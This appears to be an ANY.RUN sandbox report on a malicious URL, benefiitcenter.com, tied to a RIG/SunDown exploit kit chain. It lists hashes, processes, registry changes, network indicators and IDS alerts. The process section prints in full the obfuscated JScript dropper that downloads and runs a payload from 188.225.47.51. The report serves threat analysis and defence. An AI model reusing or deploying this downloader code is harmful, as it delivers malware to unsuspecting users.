analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://benefiitcenter.com

Full analysis: https://app.any.run/tasks/10550bb5-6615-4597-968e-a1bcdac11293
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: October 14, 2019, 14:38:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
trojan
Indicators:
MD5:

A445B823BCA2406AF67BE8B5D21FA8D5

SHA1:

DE16BF7ED6A77BF8C4616531A881E9FC43AC36E0

SHA256:

3FE100AE07714D46FB8BA6E0D0C69AC4101427D7DBBAFFFDD111C5760B2320C7

SSDEEP:

3:N1KcusbmbGKI:CcXKK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to CnC server

      • iexplore.exe (PID: 3244)

    • Starts CMD.EXE for commands execution

      • iexplore.exe (PID: 3244)

    • Application was dropped or rewritten from another process

      • radAD877.tmp.exe (PID: 3096)
      • radAD877.tmp.exe (PID: 2252)
      • radAD877.tmp.exe (PID: 2384)
      • radAD877.tmp.exe (PID: 3860)

  • SUSPICIOUS

    • Executes scripts

      • CMd.exe (PID: 3704)

    • Executable content was dropped or overwritten

      • wscript.exe (PID: 2932)
      • radAD877.tmp.exe (PID: 2384)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2932)

    • Uses WMIC.EXE to create a new process

      • radAD877.tmp.exe (PID: 2252)

    • Executed via WMI

      • radAD877.tmp.exe (PID: 3860)

    • Application launched itself

      • radAD877.tmp.exe (PID: 3096)
      • radAD877.tmp.exe (PID: 3860)

  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 1516)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3244)

    • Creates files in the user directory

      • iexplore.exe (PID: 3244)

    • Application was crashed

      • iexplore.exe (PID: 3244)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3244)

    • Application launched itself

      • iexplore.exe (PID: 1516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
10
Malicious processes
2
Suspicious processes
3

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe cmd.exe no specs wscript.exe cmd.exe no specs radad877.tmp.exe no specs radad877.tmp.exe no specs wmic.exe radad877.tmp.exe no specs radad877.tmp.exe

Process information

PID
CMD
Path
Indicators
Parent process
1516"C:\Program Files\Internet Explorer\iexplore.exe" "http://benefiitcenter.com"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3244"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1516 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3704CMd.exe /q /c cd /d "%tmp%" && echo function Q(n,g){for(var c=0,s=String,d,D="pus"+"h",b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g["length"])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O="fromC",S=O+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E="WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s ",u=function(x){return E["split"]("I")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[""+"WScr"+"ipt"]]:0;U=U[1],L=U[u(14)],v=u(9),m=U["Ar"+"guments"];s.Type=2;c=q[u(8)]();s.Charset=u(012);s["Open"]/**/();i=H(m);d=i[v](i[u(12)]("PE\x00\x00")+027);s["writetext"](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K="saveto";s[K+"file"](c,2);s.Close();z^&^&(c="Regsvr32"+p+u(18)+c);j.run("cmd"+p+" /c "+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+"."+T+u(1));d["SetProxy"](n);d["Op"+"en"](u(2),g(1),n);d["Option"](0)=g(2);d["Send"];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t "LugZ8DoD" "http://188.225.47.51/?NzkwNjU=&MVwZswJ&t4gdfdff4=ZYAVJH9aH6i0nSyRCfgZ_W_h3cZwwTq5uWRrlq2FSknrlCdsJ0wx6K6GlWyu0tVl0Y4gMSnajDE6f58EYwV0UC&jqzvyZIL=accelerator&ZLVD=difference&JMaPTzRbG=community&XiJo=neighboring&FmGHHv=disagree&ISxWZHWL=accelerator&wpaf=callous&chgYSK=mustard&gcvOZgO=consignment&WffEAL=abettor&mhznnFEL=disagree&ffd3dfdfs=xHfQMrjYbRjFFYvfKPLEUKJEMUfWA0CKwYaZhabVF5mxFDHGpbT1FxTspVSdCFqEmvVvdLUHIwSh1UzASw00yI&cSeBRNm=mustard&xyYNTk4MjU2" "¤"C:\Windows\system32\CMd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2932wsCripT //B //E:JScript n.t "LugZ8DoD" "http://188.225.47.51/?NzkwNjU=&MVwZswJ&t4gdfdff4=ZYAVJH9aH6i0nSyRCfgZ_W_h3cZwwTq5uWRrlq2FSknrlCdsJ0wx6K6GlWyu0tVl0Y4gMSnajDE6f58EYwV0UC&jqzvyZIL=accelerator&ZLVD=difference&JMaPTzRbG=community&XiJo=neighboring&FmGHHv=disagree&ISxWZHWL=accelerator&wpaf=callous&chgYSK=mustard&gcvOZgO=consignment&WffEAL=abettor&mhznnFEL=disagree&ffd3dfdfs=xHfQMrjYbRjFFYvfKPLEUKJEMUfWA0CKwYaZhabVF5mxFDHGpbT1FxTspVSdCFqEmvVvdLUHIwSh1UzASw00yI&cSeBRNm=mustard&xyYNTk4MjU2" "¤"C:\Windows\system32\wscript.exe
CMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
496"C:\Windows\System32\cmd.exe" /c radAD877.tmp.exeC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3096radAD877.tmp.exeC:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.execmd.exe
User:
admin
Integrity Level:
LOW
Exit code:
0
2252radAD877.tmp.exeC:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exeradAD877.tmp.exe
User:
admin
Integrity Level:
LOW
Exit code:
0
1268"C:\Windows\System32\wbem\WMIC.exe" process call create "C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe"C:\Windows\System32\wbem\WMIC.exe
radAD877.tmp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3860C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exeC:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exewmiprvse.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2384C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exeC:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
radAD877.tmp.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
609
Read events
528
Write events
79
Delete events
2

Modification events

(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{42F4DA3B-EE90-11E9-AB41-5254004A04AF}
Value:
0
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
2
(PID) Process:(1516) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E3070A0001000E000E00260013002400
Executable files
2
Suspicious files
0
Text files
12
Unknown types
5

Dropped files

PID
Process
Filename
Type
1516iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
1516iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\benefiitcenter_com[1].txt
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\52bb03c0-ee90-11e9-946d-128484243d82[1].txt
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\52bb03c0-ee90-11e9-946d-128484243d82[1].htm
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\zcredirect[1].txt
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@atztds15[1].txt
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\188_225_47_51[1].txt
MD5:
SHA256:
3244iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WT93FFVT\benefiitcenter_com[1].htmhtml
MD5:C99176AF5D7F35F01A99865C7D8B5AB4
SHA256:5D4FCF1193E4D29A24F09FB9C35F4DD3B22CDF99E91847956A429E8A9A9D09E0
3244iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@benefiitcenter[1].txttext
MD5:A1AE190099C00D37BA9EE018C6148417
SHA256:F616CAE3B87FD2A8DA7A272B79DBE2DAF87625BCD5A5B91801A0BE73E4225251
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
11
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3244
iexplore.exe
GET
302
94.130.90.228:80
http://atztds15.com/wef9qwh344iq23r
DE
suspicious
3244
iexplore.exe
GET
200
200.63.47.3:80
http://benefiitcenter.com/
PA
html
474 b
malicious
3244
iexplore.exe
GET
200
52.207.141.11:80
http://usd.odysseus-nua.com/zcvisitor/52bb03c0-ee90-11e9-946d-128484243d82?campaignid=2828df60-6c0e-11e9-87d5-12077332b422
US
html
1010 b
malicious
3244
iexplore.exe
GET
200
52.207.141.11:80
http://usd.odysseus-nua.com/zcredirect?visitid=52bb03c0-ee90-11e9-946d-128484243d82&type=js&browserWidth=1276&browserHeight=560&iframeDetected=false
US
html
228 b
malicious
1516
iexplore.exe
GET
200
188.225.47.51:80
http://188.225.47.51/favicon.ico
RU
suspicious
1516
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3244
iexplore.exe
GET
302
200.63.47.3:80
http://benefiitcenter.com/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTU3MTA3MTA5OSwiaWF0IjoxNTcxMDYzODk5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIybjZva2lvMjVpY2htNGxzdTQwY3YxZzIiLCJuYmYiOjE1NzEwNjM4OTksInRzIjoxNTcxMDYzODk5Nzg1NzgxfQ.JQvDVaJLkSjx9bTV1PbuCBN_xH_LGWhMo52r-oB9zVA&sid=4429c74c-ee90-11e9-8de1-6fc178c1ae1e
PA
text
11 b
malicious
3244
iexplore.exe
GET
200
188.225.47.51:80
http://188.225.47.51/?MzM1OTcz&kmtV&GwbMgL=mustard&QWFIL=community&jcQxipNBg=consignment&ffd3dfdfs=wXjQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9cmnihNzUSkr76B2aC&IBriYPCOL=callous&spPEressy=abettor&qsRWhB=callous&eceNhWsRo=neighboring&HSXhszw=mustard&t4gdfdff4=m2EofoofuZSaQbmhUWDelFizYhbBA4Qpfiu30iEnxDPhJ-D-hOLUTp1u9CdUbI&clsGOKl=electrical&CboBkqr=disagree&zACp=electrical&tymSOiWRm=disagree&sDiKMgzMjA2NTU1
RU
html
37.3 Kb
suspicious
2932
wscript.exe
GET
200
188.225.47.51:80
http://188.225.47.51/?NzkwNjU=&MVwZswJ&t4gdfdff4=ZYAVJH9aH6i0nSyRCfgZ_W_h3cZwwTq5uWRrlq2FSknrlCdsJ0wx6K6GlWyu0tVl0Y4gMSnajDE6f58EYwV0UC&jqzvyZIL=accelerator&ZLVD=difference&JMaPTzRbG=community&XiJo=neighboring&FmGHHv=disagree&ISxWZHWL=accelerator&wpaf=callous&chgYSK=mustard&gcvOZgO=consignment&WffEAL=abettor&mhznnFEL=disagree&ffd3dfdfs=xHfQMrjYbRjFFYvfKPLEUKJEMUfWA0CKwYaZhabVF5mxFDHGpbT1FxTspVSdCFqEmvVvdLUHIwSh1UzASw00yI&cSeBRNm=mustard&xyYNTk4MjU2
RU
binary
214 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1516
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3244
iexplore.exe
188.225.47.51:80
TimeWeb Ltd.
RU
suspicious
3244
iexplore.exe
200.63.47.3:80
benefiitcenter.com
Panamaserver.com
PA
malicious
3244
iexplore.exe
52.207.141.11:80
usd.odysseus-nua.com
Amazon.com, Inc.
US
malicious
1516
iexplore.exe
52.207.141.11:80
usd.odysseus-nua.com
Amazon.com, Inc.
US
malicious
94.130.90.228:80
atztds15.com
Hetzner Online GmbH
DE
malicious
3244
iexplore.exe
85.114.146.93:443
btcseller.club
myLoc managed IT AG
DE
malicious
2932
wscript.exe
188.225.47.51:80
TimeWeb Ltd.
RU
suspicious
1516
iexplore.exe
188.225.47.51:80
TimeWeb Ltd.
RU
suspicious

DNS requests

Domain
IP
Reputation
benefiitcenter.com
  • 200.63.47.3
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared
usd.odysseus-nua.com
  • 52.207.141.11
  • 52.202.53.245
  • 34.230.160.215
  • 52.207.32.96
  • 35.168.147.213
  • 3.229.163.120
  • 3.226.8.132
  • 35.175.38.64
unknown
btcseller.club
  • 85.114.146.93
whitelisted
atztds15.com
  • 94.130.90.228
suspicious

Threats

PID
Process
Class
Message
3244
iexplore.exe
Misc activity
ADWARE [PTsecurity] Redirecting.Zemot (RBN ZeroPark 0-Click)
3244
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
3244
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS SunDown EK RIP Landing M1 B642
3244
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS SunDown EK RIP Landing M1 B643
2932
wscript.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://benefiitcenter.com